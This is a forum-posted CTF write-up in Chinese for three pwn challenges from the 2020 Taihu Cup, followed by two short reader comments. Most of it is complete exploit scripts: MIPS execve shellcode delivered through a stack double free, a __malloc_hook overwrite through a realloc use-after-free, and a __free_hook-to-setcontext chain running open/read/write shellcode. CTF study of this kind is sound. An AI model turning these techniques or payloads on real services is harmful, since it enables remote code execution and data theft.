2020太湖杯pwn题解
2020-11-7 19:35 6843


比赛刚刚结束,把wp放出来

pwn1

在stack布置fake chunk,然后利用double free劫持stack,覆盖返回地址执行shellcode(shellcode直接放在栈上,依赖目标未开启NX;用到的栈地址和canary都来自程序自身的回显)

#https://github.com/matrix1001/welpwn
from PwnContext import *
 
try:
    from IPython import embed as ipy
except ImportError:
    print ('IPython not installed.')
 
if __name__ == '__main__':
    # Terminal / logging setup, then the target context: 32-bit little-endian
    # MIPS (the shellcode below is o32 MIPS).
    context.terminal = ['tmux', 'splitw', '-h']
    context.log_level = 'debug'
    context(arch='mips', os='linux', endian='little', word_size=32)

    # Thin I/O wrappers over the welpwn `ctx`.  Every payload goes through
    # str() so menu choices and indices can be passed as plain ints.
    def s(data):
        return ctx.send(str(data))

    def sa(delim, data):
        return ctx.sendafter(str(delim), str(data))

    def sl(data):
        return ctx.sendline(str(data))

    def sla(delim, data):
        return ctx.sendlineafter(str(delim), str(data))

    def r(numb=4096):
        return ctx.recv(numb)

    def ru(delims, drop=True):
        return ctx.recvuntil(delims, drop)

    def irt():
        return ctx.interactive()

    def rs(*args, **kwargs):
        return ctx.start(*args, **kwargs)

    def dbg(gs='', **kwargs):
        return ctx.debug(gdbscript=gs, **kwargs)

    # Unpack a short leak by zero-padding it to a full word.
    def uu32(data):
        return u32(data.ljust(4, '\0'))

    def uu64(data):
        return u64(data.ljust(8, '\0'))

    # Challenge endpoint (CTF infrastructure, long gone).
    ctx.remote = ('121.36.166.138', 8893)
 
    def lg(s,addr):
        """Print label `s` and `addr` as hex in bold red so leaks stand out in the debug log."""
        label = str(s).rjust(20)
        print('\033[1;31;40m' + label + '-->0x' + format(addr, 'x') + '\033[0m')
 
    def add(idx,content='\n'):
        """Menu 1: allocate note `idx` and write `content` into it."""
        # Prompts are matched on their tails ('ice\n' is presumably "choice").
        sla('ice\n',1)
        sla('\n',idx)
        sa('\n',content)
 
    def delete(idx):
        """Menu 2: free note `idx`.

        The program evidently leaves the freed pointer usable: the main flow
        below frees note 1 twice (the double free the exploit relies on).
        """
        sla('ice\n',2)
        sla('n',idx)
 
    #def show(idx):
 
    def edit(content):
        """Menu 3: write `content` into the program's (index-less) buffer.

        The main flow treats this buffer as stack-resident: it is used to
        clobber the canary's NUL byte for the leak and to plant the fake chunk
        header that the double free later hands back.
        """
        sla('ice\n',3)
        sa('\n',content)
 
 
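    rs('remote')

    # MIPS o32 little-endian shellcode: two lui/ori pairs build "/bin/sh\0" on
    # the stack, then execve(path, 0, 0) via syscall 4011 (0xfab).
    shellcode = '\x69\x6e\x02\x3c\x2f\x62\x42\x34\0\0\xa2\xaf\x68\0\x02\x3c\x2f\x73\x42\x34\x04\0\xa2\xaf\0\0\xa4\x27\xab\x0f\x02\x24\0\0\x05\x24\0\0\x06\x24\x0c\0\0\0'
    # NOTE(review): the original also computed `system`/`bin_sh` addresses on a
    # 0xf66cd000 libc base that were never used; a ret2libc variant would need
    # them, the shellcode path below does not, so they were dropped.

    # After the first prompt the program prints a stack address; it is the
    # only leak needed since the final payload lives on the stack.
    sla('o!\n',shellcode)
    ru('0x')
    stack = int(r(8),16)
    # Canary leak: 0x21 bytes overwrite the canary's terminating NUL byte so
    # the following output runs straight into it.  Only the upper three bytes
    # are printed; the low byte is re-padded with 0x00.
    edit('e'*0x21)
    canary=u32(ru("\n",drop=False)[-4:-1].rjust(4,"\x00"))
    # Plant a fake chunk header (size 0x41) on the stack; the word right after
    # it is the canary slot, so the canary is written back in the same go.
    edit(p32(0)*7+p32(0x41)+p32(canary))
    add(1,'\n')
    add(2,'\n')
    # free(1) free(2) free(1): the classic double free with another chunk in
    # between so the allocator's "same chunk freed twice in a row" check does
    # not fire.
    delete(1)
    delete(2)
    delete(1)
    # Note 1 comes back first; its first word is the bin's forward pointer,
    # which now points at the fake chunk header at stack+0x20.
    add(4,p32(stack+0x20))
    add(5,'\n')
    add(6,'\n')
    # This allocation is the stack fake chunk: restore the canary, one 4-byte
    # slot (likely a saved register), the return address pointing just past
    # itself at stack+0x34, then the shellcode.  Needs an executable stack.
    add(7,p32(canary)+p32(0)+p32(stack+0x34)+shellcode)

    # Menu option 4 makes the vulnerable function return into the shellcode
    # (presumably "exit"; the prompt text is not visible here).
    sla('ice',4)
    irt()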

pwn2

编辑功能中,size为0时调用realloc(ptr, 0)会释放chunk,但程序未清空指针,造成UAF

#https://github.com/matrix1001/welpwn
from PwnContext import *
 
try:
    from IPython import embed as ipy
except ImportError:
    print ('IPython not installed.')
 
if __name__ == '__main__':
    context.terminal = ['tmux', 'splitw', '-h']
    context.log_level = 'debug'

    # Thin I/O wrappers over the welpwn `ctx`.  Every payload goes through
    # str() so menu choices, indices and sizes can be passed as plain ints.
    def s(data):
        return ctx.send(str(data))

    def sa(delim, data):
        return ctx.sendafter(str(delim), str(data))

    def sl(data):
        return ctx.sendline(str(data))

    def sla(delim, data):
        return ctx.sendlineafter(str(delim), str(data))

    def r(numb=4096):
        return ctx.recv(numb)

    def ru(delims, drop=True):
        return ctx.recvuntil(delims, drop)

    def irt():
        return ctx.interactive()

    def rs(*args, **kwargs):
        return ctx.start(*args, **kwargs)

    def dbg(gs='', **kwargs):
        return ctx.debug(gdbscript=gs, **kwargs)

    # Unpack a short leak by zero-padding it to a full word.
    def uu32(data):
        return u32(data.ljust(4, '\0'))

    def uu64(data):
        return u64(data.ljust(8, '\0'))

    # Target description.  custom_lib_dir is a machine-local path to the
    # glibc 2.29-0ubuntu2 build the exploit's offsets were taken from;
    # debug_remote_libc is the welpwn switch that uses it for the local run
    # (see the welpwn README for exact semantics).
    ctx.binary = './pwn'
    ctx.custom_lib_dir = '/home/iddm/glibc-all-in-one/libs/2.29-0ubuntu2_amd64'
    ctx.remote = ('119.3.89.93', 8015)
    # ctx.remote_libc = './libc.so'   # alternative: point at the shipped libc
    ctx.debug_remote_libc = True

    # Symbols and breakpoints consumed by dbg(): the note table in .bss and
    # the menu loop.
    ctx.symbols = {'node': 0x4040}
    ctx.breakpoints = [0x17D6]  # menu
 
    def lg(s,addr):
        """Print label `s` and `addr` as hex in bold red so leaks stand out in the debug log."""
        label = str(s).rjust(20)
        print('\033[1;31;40m' + label + '-->0x' + format(addr, 'x') + '\033[0m')
 
    def add(idx,size,content='\n'):
        """Menu 1: allocate note `idx` with `size` bytes and write `content`."""
        sla('ice',1)
        sla('index',idx)
        sla('size',size)
        sa('content',content)
 
    def delete(idx):
        """Menu 3: free note `idx`."""
        sla('ice',3)
        sla('index',idx)
 
    def show(idx):
        """Menu 4: print the contents of note `idx` (caller parses the output)."""
        sla('ice',4)
        sla('index',idx)
 
    def edit(idx,size,content='\n'):
        """Menu 2: resize note `idx` to `size` and, if non-zero, write `content`.

        With size 0 the program asks for no content: per the write-up it
        calls realloc(ptr, 0), which frees the chunk while the note keeps its
        pointer.  That dangling note is the UAF used throughout the exploit.
        """
        sla('ice',2)
        sla('index',idx)
        sla('size',size)
        if size != 0:
            sa('content',content)
 
 
    rs('remote')


    # --- heap leak ---------------------------------------------------------
    # Three 0x10-byte notes (0x20 chunks).  Note 3 is freed normally; note 0
    # is "freed" through edit(size=0), i.e. realloc(ptr, 0) with the pointer
    # left in place.
    #dbg()
    add(0,0x10)
    add(2,0x10)
    add(3,0x10)
    delete(3)
    edit(0,0)
    #edit(1,0)
    #edit(0,0)

    # show() on the dangling note prints the tcache `next` pointer the
    # allocator stored in the freed chunk (it points at note 3's chunk).  The
    # 0x2c0 delta to the heap base is specific to this allocation sequence.
    show(0)
    #ru('content:')

    heap_base = uu64(ru('\n',drop=True)[-6:]) - 0x2c0
    lg('heap_base',heap_base)

    #dbg()

    # Fill the 0x20 tcache bin (7 entries) so the next free of this size goes
    # to the fastbin, where realloc-on-a-freed-chunk lets us rewrite `fd`.
    for i in range(7):
        add(10+i,0x10)
    for i in range(7):
        delete(10+i)
    #dbg()
    # realloc(note2, 0) frees note 2 into the fastbin; realloc(note2, 0x10)
    # then hands the same still-free chunk back, so the content write lands on
    # its fastbin fd.  heap_base+0x250 becomes the next chunk in that bin.
    edit(2,0)
    edit(2,0x10,p64(heap_base+0x250))
    # NOTE(review): the 0x20 tcache is still full at this point, so for these
    # two allocations to be served from the fastbin the program must allocate
    # in a way that bypasses tcache (calloc would) — confirm against the binary.
    add(4,0x10)
    add(5,0x10)

    # Hidden menu option 666 prints a libc pointer after "gift: ".  The
    # 0x264140 delta, the one_gadget (0x106ef8) and __malloc_hook (0x1e4c30)
    # offsets are for the 2.29-0ubuntu2 libc named in ctx.custom_lib_dir.
    sla('ice',666)
    ru('gift: ')
    libc_base = int(r(14),16) - 0x264140
    one = libc_base + 0x106ef8
    malloc_hook = libc_base+ 0x1e4c30
    sla('string: ','aaa')

    # Same trick in the 0x70 size class: fill the tcache, free note 27 into
    # the fastbin via realloc(0), then redirect its fd to __malloc_hook-0x23
    # (the usual slot whose 0x7f byte passes the fastbin size check).
    for i in range(8):
        add(20+i,0x5f)
    for i in range(7):
        delete(20+i)
    edit(27,0)
    edit(27,0x5f,p64(malloc_hook-0x23))
    # NOTE(review): leftover debugger attach left in the final remote run;
    # drop or guard it when running unattended.
    dbg()
    add(30,0x5f)
    # The second allocation is the fake chunk in front of the hook: 0x13 bytes
    # of padding, then __malloc_hook = one_gadget.  It fires on the next
    # malloc, which the script leaves to the interactive session.
    add(31,0x5f,'\0'*0x13+p64(one))


    irt()

pwn3

利用残留指针泄露libc和heap地址
然后利用realloc(ptr, 0)造成UAF,从而构成double free
在chunk中布置fake chunk,利用fastbin attack让分配指过去,从而造成堆块重叠,获得任意地址读写
然后修改__free_hook为setcontext+53,再跳到ORW(open/read/write)shellcode读flag

#https://github.com/matrix1001/welpwn
from PwnContext import *
 
try:
    from IPython import embed as ipy
except ImportError:
    print ('IPython not installed.')
 
if __name__ == '__main__':
    context.terminal = ['tmux', 'splitw', '-h']
    context.log_level = 'debug'

    # Thin I/O wrappers over the welpwn `ctx`.  Every payload goes through
    # str() so menu choices, numbers and lengths can be passed as plain ints.
    def s(data):
        return ctx.send(str(data))

    def sa(delim, data):
        return ctx.sendafter(str(delim), str(data))

    def sl(data):
        return ctx.sendline(str(data))

    def sla(delim, data):
        return ctx.sendlineafter(str(delim), str(data))

    def r(numb=4096):
        return ctx.recv(numb)

    def ru(delims, drop=True):
        return ctx.recvuntil(delims, drop)

    def irt():
        return ctx.interactive()

    def rs(*args, **kwargs):
        return ctx.start(*args, **kwargs)

    def dbg(gs='', **kwargs):
        return ctx.debug(gdbscript=gs, **kwargs)

    # Unpack a short leak by zero-padding it to a full word.
    def uu32(data):
        return u32(data.ljust(4, '\0'))

    def uu64(data):
        return u64(data.ljust(8, '\0'))

    # Target description: local binary plus the (long gone) CTF endpoint.
    ctx.binary = './pwn'
    ctx.remote = ('122.112.231.25', 8005)

    # Symbols and breakpoints consumed by dbg(): two .bss tables and the
    # menu loop.
    ctx.symbols = {
        'mark1': 0x203060,
        'node': 0x203080,
    }
    ctx.breakpoints = [0x1557]  # menu
 
    def lg(s,addr):
        """Print label `s` and `addr` as hex in bold red so leaks stand out in the debug log."""
        label = str(s).rjust(20)
        print('\033[1;31;40m' + label + '-->0x' + format(addr, 'x') + '\033[0m')
 
    def add(number,length,info='\n',name='\n'):
        """Menu 1: create a record `number` with a `name`, an `info` buffer of `length` bytes."""
        sla('>>>',1)
        sa('Name',name)
        sla('Number',number)
        sla('len',length)
        sa('Info',info)
    def delete(number):
        """Menu 3: free record `number` (this is what eventually calls __free_hook)."""
        sla('>>>',3)
        sla('Number',number)
 
    def edit(number,choice,length,info='\n'):
        """Menu 2: edit record `number`; `choice` picks the field (2 = info in the main flow).

        `length` 0 skips the content prompt; per the write-up the program then
        calls realloc(ptr, 0), freeing the buffer while the record keeps its
        pointer — the UAF that seeds the double free.
        """
        sla('>>>',2)
        sla('Number',number)
        sla('>',choice)
        sla('len',length)
        if length != 0:
            sa('info',info)
 
    def edit2(number,payload):
        """Menu 2, choice 1: overwrite the name of record `number` (no length prompt).

        Used once the record's name pointer has been redirected, turning this
        into an arbitrary write.
        """
        sla('>>>',2)
        sla('Number',number)
        sla('>',1)
        sa('name',payload)
 
    def show(number):
        """Menu 4: print record `number` (caller parses the output)."""
        sla('>>>',4)
        sla('number',number)
 
    #rs()
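    rs('remote')

    # Program-specific start-up input (two short strings).  Their meaning is
    # not derivable from this script; presumably worked out in gdb.
    sa('String1:','\x04\x01\n')
    sa('String2:','\x01\x70\n')

    # --- libc leak via a stale pointer ----------------------------------
    # A 0x90 request (0xa0 chunk) is too large for fastbins.  Note 1 keeps it
    # from merging into top, so freeing it leaves arena pointers in its data;
    # re-adding the same size returns the same chunk and the program prints
    # it without clearing.  Offsets here and __free_hook = 0x3c67a8 below are
    # for a glibc 2.23 build (no tcache) — verify against the target libc.
    add(0,0x90)
    add(1,0x20)
    delete(0)
    add(0,0x90)
    show(0)

    libc_base = uu64(ru('\x7f',drop=False)[-6:]) - 0x3c4b0a - 0x100
    lg('libc_base',libc_base)

    # --- heap leak via a fastbin fd -------------------------------------
    # Two 0x30 chunks freed 3-then-2 leave note 2's fd pointing at note 3.
    # Re-adding note 2 with the default "\n" info overwrites only the fd's
    # low byte (0x0a), hence the -0xa correction before the -0x200 delta.
    #dbg()
    add(2,0x20)
    add(3,0x20)
    delete(3)
    delete(2)
    add(2,0x20)
    show(2)
    ru('Info:')
    heap_base = uu64(r(6))-0xa - 0x200
    lg('heap_base',heap_base)
    #dbg()

    # Fake 0x71 chunk header planted in note 3's data (at heap_base+0x3a0);
    # note 4 is filled with 0x21 so the memory after the fake chunk looks
    # like a sane size field.
    payload = p64(0)+p64(0x71)+'\n'

    add(3,0x30,info=payload)
    add(4,0x50,info=p64(0x21)*10,name=p64(0x21)*2)
    #dbg()
    # Double free in the 0x70 fastbin: edit(len=0) is realloc(ptr, 0) and
    # frees note 5 while the record keeps its pointer; free(6) then free(5)
    # passes the "same chunk as bin head" check.  Bin: 5 -> 6 -> 5.
    add(5,0x60)
    add(6,0x60)
    edit(5,2,0)
    delete(6)
    delete(5)
    #dbg()
    # Re-allocating 5 rewrites its fd to the fake chunk; 6 and 5 are drained
    # and the fourth 0x60 allocation (note 11) lands on the fake chunk, which
    # overlaps another record.  The fields written look like (name ptr =
    # __free_hook, number = 4, info ptr = heap_base+0x190), i.e. note 4's
    # record, so edit2(4, ...) writes through the redirected name pointer and
    # turns __free_hook into setcontext+53 (per the write-up).  Record layout
    # inferred from the two payloads — verify in gdb.
    add(5,0x60,p64(heap_base+0x3a0)+'\n')
    add(6,0x60,'./flag\0','./flag\0')
    add(10,0x60)
    free_hook = 0x3c67a8+libc_base
    payload = p64(0)*6+p64(free_hook)+p64(4)+p64(heap_base+0x190)
    add(11,0x60,payload)
    edit2(4,p64(libc_base + 0x47b85))
    #dbg()

    # SigreturnFrame() lays itself out according to context.arch, so pin the
    # architecture *before* building the frame.  The original set it only
    # afterwards and relied on ctx.binary having done so implicitly.
    context.arch = 'amd64'
    # When free(p) runs, setcontext+53 loads registers from p.  This frame
    # calls libc+0x101830 with (heap_base, 0x1000, 7) — the argument triple
    # of mprotect(addr, len, PROT_RWX); confirm the symbol — and returns via
    # rsp = heap_base+0x960, where note 12 stores a pointer to the shellcode.
    frame = SigreturnFrame()
    frame.rax = 0
    frame.rdi = heap_base
    frame.rsi = 0x1000
    frame.rdx = 7
    frame.rip = libc_base + 0x101830
    frame.rsp = heap_base + 0x960
    payload = str(frame)
    add(13,0xf0,info=payload)

    # ORW shellcode: open("./flag" — written by note 6, expected at
    # heap_base+0x6a0), read 0x40 bytes into heap_base, write them to stdout.
    # Note 12's data starts with the return address the frame's rsp lands on,
    # followed by the code itself at heap_base+0x968.
    shellcode = ""
    shellcode += shellcraft.amd64.syscall("SYS_open",heap_base+0x6a0,'O_RDONLY', 0)
    shellcode += shellcraft.amd64.syscall("SYS_read",3,heap_base,0x40)
    shellcode += shellcraft.amd64.syscall("SYS_write",1,heap_base,0x40)
    shellcode = asm(shellcode)
    add(12,0x90,p64(heap_base+0x968)+shellcode)

    # NOTE(review): leftover debugger attach in the final remote run; drop or
    # guard it when running unattended.
    dbg()
    # Re-point the overlapped record at the frame (expected at heap_base+0x800)
    # and free it: free -> __free_hook -> setcontext+53 -> mprotect -> ORW.
    payload = p64(0)*5+p64(0x21)+p64(heap_base+0x800)+p64(4)+p64(heap_base)
    edit(11,2,0x68,info=payload)
    delete(4)

    irt()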


Zard_ 2020-11-11 09:15
太给力了 谢谢您的分享
t1an5g 2 2020-11-12 09:59
国内的比赛终于知道开始玩realloc了